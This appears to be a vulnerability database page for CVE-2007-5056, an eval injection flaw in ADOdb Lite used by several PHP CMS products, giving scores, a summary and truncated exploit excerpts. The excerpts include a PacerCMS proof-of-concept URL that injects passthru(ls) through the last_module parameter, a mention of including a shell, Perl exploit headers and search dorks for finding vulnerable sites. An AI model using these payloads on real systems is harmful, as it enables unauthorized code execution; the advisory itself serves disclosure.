CVE-2007-5056

Published: 24/09/2007 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 705
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Eval injection vulnerability in adodb-perf-module.inc.php in ADOdb Lite 1.42 and previous versions, as used in products including CMS Made Simple, SAPID CMF, Journalness, PacerCMS, and Open-Realty, allows remote malicious users to execute arbitrary code via PHP sequences in the last_module parameter.

Vulnerable Product

adodb lite adodb lite

pacercms pacercms

sapid sapid cmf

cmsmadesimple cms made simple

journalness journalness

open-realty open-realty

Exploits

### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability ### Script R84 : puzzledlsourceforgenet/sourceforge/sapidcmf/sapidcmfr84zip ### Script Update R87 :surfnetdlsourceforgenet/sourceforge/sapidcmf/sapidcmfupdater84-r87zip ### Dork : Powered by SAPID CMF Build 87 ### Vuln : ### 09: */ eval('class perfmo ...
#!/usr/bin/perl # # Vendor url: wwwopen-realtyorg # # note: exploit requires Register_globals = On in phpini # ~Iron # wwwrandombasecom require LWP::UserAgent; print "# # Open-Realty <= 243 Remote Code Execution exploit # By Iron - randombasecom # Greets to everyone at RootShell Security Group # # Example target url: ...
#!/usr/bin/perl # # Vendor url: journalnesssourceforgenet # # note: exploit requires Register_globals = On in phpini # ~Iron # wwwrandombasecom require LWP::UserAgent; print "# # Journalness <= 41 Remote Code Execution exploit # By Iron - randombasecom # Greets to everyone at RootShell Security Group & dHack # # Ex ...
### PacerCMS 06 (last_module) Remote Code Execution Vulnerability ### Script : ovhdlsourceforgenet/sourceforge/pacercms/pacercms06zip ### Dork : Powered by PacerCMS ### POC : ### /includes/adodb_lite/adodb-perf-moduleincphp?last_module=t{};%20class%20t{};passthru(ls);// ### OR INCLUDE SHELL ### /includes/adodb_lite/adodb- ...